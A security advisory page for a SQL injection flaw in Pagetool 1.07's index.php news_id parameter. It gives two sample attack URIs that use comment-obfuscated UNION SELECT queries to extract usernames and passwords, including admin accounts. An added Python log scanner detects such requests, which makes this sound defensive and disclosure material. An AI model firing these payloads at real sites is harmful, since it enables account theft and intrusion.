

Title Pagetool Index.PHP SQL Injection Vulnerability
Published 2007-06-25-12:00AM
Updated 2008-02-26-01:53AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Katatafish is credited with the discovery of this vulnerability.
Vulnerable  Pagetool Pagetool 1.07
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue. A sample URI has been provided:

http://www.example.com/[path]/index.php?name=pagetool_news&news_id=-1/**/union/**/all/**/select/**/null,/**/null,/**/CONCAT(0x557365726E346D653A20,/**/username),/**/CONCAT(0x50617373773072643A20,/**/passwd),/**/null/**/from/**/pt_core_users/**/where/**/user_id=1

http://www.example.com/index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/LIKE/**/0x2561646D696E25/*
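
A defensive check for the pattern in the sample URIs, as an added example that is not part of the original advisory: it scans web access log lines for news_id values that are not plain integers and flags those in which SQL keywords appear once /**/ comments are replaced by spaces. The log lines, the function names and the assumption that a legitimate news_id is an unsigned integer are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (sample data, not taken from the advisory).
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Jun/2007:10:01:02 +0000] "GET /index.php?name=pagetool_news&news_id=42 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [25/Jun/2007:10:01:09 +0000] "GET /index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/null,null HTTP/1.1" 200 811',
    '198.51.100.9 - - [25/Jun/2007:10:01:15 +0000] "GET /index.php?name=pagetool_news&news_id=7%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1 HTTP/1.1" 200 790',
    '203.0.113.4 - - [25/Jun/2007:10:02:00 +0000] "GET /index.php?name=pagetool_gallery&id=3 HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INLINE_COMMENT_RE = re.compile(r'/\*.*?\*/', re.S)
SQL_KEYWORD_RE = re.compile(r'\b(union|select|from|where|concat)\b', re.I)

def classify_news_id(value):
    """Return 'ok', 'non_numeric' or 'sqli_pattern' for one news_id value."""
    # Assumption: a legitimate news_id is a short unsigned integer.
    if re.fullmatch(r'\d{1,10}', value):
        return 'ok'
    # Replace /**/ comments with spaces so keywords they separate become visible.
    normalized = INLINE_COMMENT_RE.sub(' ', value)
    # The page's second sample ends with an unterminated /*; strip that marker too.
    normalized = normalized.replace('/*', ' ')
    if SQL_KEYWORD_RE.search(normalized):
        return 'sqli_pattern'
    return 'non_numeric'

def scan(lines):
    """Return (client_ip, verdict, raw_value) for each suspicious news_id request."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qs percent-decodes, so encoded comment markers are caught as well.
        for value in parse_qs(query, keep_blank_values=True).get('news_id', []):
            verdict = classify_news_id(value)
            if verdict != 'ok':
                findings.append((line.split()[0], verdict, value))
    return findings

if __name__ == '__main__':
    for ip, verdict, value in scan(SAMPLE_LOG):
        print(ip, verdict, value)
```

The same integer test applied in the application before news_id reaches the query rejects both sample URIs, since neither value is a plain integer.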



Copyright 2007, SecurityDot
Sat, 22 Nov 2008 21:24:20 +0000
